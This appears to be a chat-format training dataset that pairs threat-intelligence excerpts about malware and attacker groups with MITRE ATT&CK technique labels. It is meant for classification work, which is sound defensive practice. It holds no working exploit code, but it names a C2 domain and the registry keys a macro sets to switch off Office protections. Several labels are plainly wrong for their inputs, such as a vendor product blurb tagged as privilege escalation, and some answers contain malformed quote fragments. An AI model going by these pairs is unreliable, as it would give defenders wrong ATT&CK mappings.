- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "China Chopper's server component can change the timestamp of files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then takes note of the infected machine’s IP address, user, domain, hostname, OS and Service Pack, and the username and password combination that worked during the brute force routine"
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise enumerates processes via the \"tasklist\" command."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fake domains . Our latest Transparent Tribe research confirms that the group continues to create malicious domains mimicking defense-related entities as a core component of their operations. Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. The attackers then used this fake website, which they hosted on a domain that was nearly identical to its legitimate counterpart, to distribute ObliqueRAT. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Malicious file-sharing domains . Transparent Tribe also regularly registers domains that appear to be legitimate file- and media-sharing services. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Conference attendees . Transparent Tribe also finds attendees of specific conferences to target. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT modified its security token to grants itself debugging privileges by adding \"SeDebugPrivilege\"."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.” Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used RAR to compress collected data before."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user’s domain security identifier (SID) in order to access their mailbox. Further other notable User-Agent entries tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs . Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used `mshta.exe` to execute malicious HTA files."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors have made some small changes, such as altering the variable names to avoid Yara detection"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can be used to forge Kerberos tickets using the password hash of the AZUREADSSOACC account."
- },
- {
- "role": "assistant",
- "content": "T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used WMI event filters to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads."
- },
- {
- "role": "assistant",
- "content": "T1027.009 - Embedded Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic uses the \"net time\" command to get the system time from the machine and collect the current date and time zone information."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike will break large data sets into smaller chunks for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz has the ability to download additional files to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaRicto has obtained open source tools to use in their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can check for running processes on the victim’s machine to look for Kaspersky and Bitdefender antivirus products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has performed brute force attacks against administrator accounts."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses DLL side-loading to load malicious programs."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The shellcode retrieves an additional payload by connecting to the following C2 server using DNS: aaa.stage.14919005.www1.proslr3[.]com Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard can use `OpenRemoteServiceManager` to create a service."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti ransomware can spread itself by infecting other remote machines via network shared drives."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes the netstat -ano command."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton modifies the tty_tickets line in the sudoers file."
- },
- {
- "role": "assistant",
- "content": "T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used different versions of Mimikatz to obtain credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g. These dynamic updates to Goldmax configuration data enable ability to set a new activation date, replace the existing C2 URL and User-Agent values, enable/disable decoy network traffic feature, and update the number range used by its PRNG"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Invoke-TokenManipulation Exfiltration module can be used to locate and impersonate user logon tokens."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf uses custom base64 encoding to obfuscate HTTP traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can encrypt C2 traffic with AES."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has attempted to lure victims into opening malicious attachments delivered via spearphishing."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy has used URL/Percent Encoding on data exfiltrated via HTTP POST requests."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate can use a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has uploaded backdoored Docker images to Docker Hub."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Office documents, databases, archives, and multimedia files are the usual file types targeted by ransomware. It’s the same for this version of Erebus, which encrypts 433 file types. However, the ransomware appears to be coded mainly for targeting and encrypting web servers and data stored in them."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore can use AppleScript to inject malicious JavaScript into a browser."
- },
- {
- "role": "assistant",
- "content": "T1059.002 - Command and Scripting Interpreter: AppleScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt has a command to delete a specified file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In some previous phishing email campaigns, attackers leveraged SendGrid to distribute the initial emails to hide the Google Drive links in the documents behind a SendGrid URL as a way to bypass traditional defences"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses port 443 for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OfficeScan’s Vulnerability Protection shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed. Trend Micro™ Deep Discovery™ provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has intercepted unencrypted private keys as well as private key pass-phrases."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used port 8080 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can deliver \"beacon\" payloads for lateral movement by leveraging remote COM execution."
- },
- {
- "role": "assistant",
- "content": "T1021.003 - Remote Services: Distributed Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter used several Windows API functions to gather information from the infected system."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "decodes Base64 strings and decrypts strings using a custom XOR algorithm."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can Base64-encode C2 commands."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ has been distributed via spearphishing emails, usually containing a malicious RTF or Excel attachment."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stonedrill (Trojan.Stonedrill): Custom malware capable of opening a backdoor on an infected computer and downloading additional files. The malware also features a destructive component, which can wipe the master boot record of an infected computer"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, the macro attempts to enable macros in multiple versions of Word, PowerPoint, Publisher and Excel by setting the following registry keys to the value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\VBAWarnings The macro also attempts to disable protections provided by the Protected View capability within Word, Excel, and PowerPoint by setting the following registry keys to a value of 1: HKCU\\Software\\Microsoft\\Office\\11.0\\Word\\Security\\ProtectedView\\DisableInternetFilesInPV First Stage Payload The payload installed by the macro is a downloader Trojan written in VB.NET that downloads a secondary payload and decoy document"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing', 'T1518.001 - Software Discovery: Security Software Discovery', 'T1005 - Data from Local System', 'T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1112 - Modify Registry', 'T1598.002 - Spearphishing Attachment', 'T1204 - User Execution', 'T1203 - Exploitation for Client Execution', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The net time command can be used in to determine the local or remote system time."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use junk code to generate random activity to obscure malware behavior."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WinMM uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT has exfiltrated data over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has obfuscated scripts with the BatchEncryption tool."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The MainConnectionIo function checks if the Windows Firewall is enabled, sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function. If the communication fails, ZxShell disables the firewall by modifying the registry key"
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT uses HTTPS and HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information."
- },
- {
- "role": "assistant",
- "content": "T1484.002 - Domain Trust Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can enumerate processes on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses remote services such as VPN, Citrix, or OWA to persist in an environment."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole uses HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
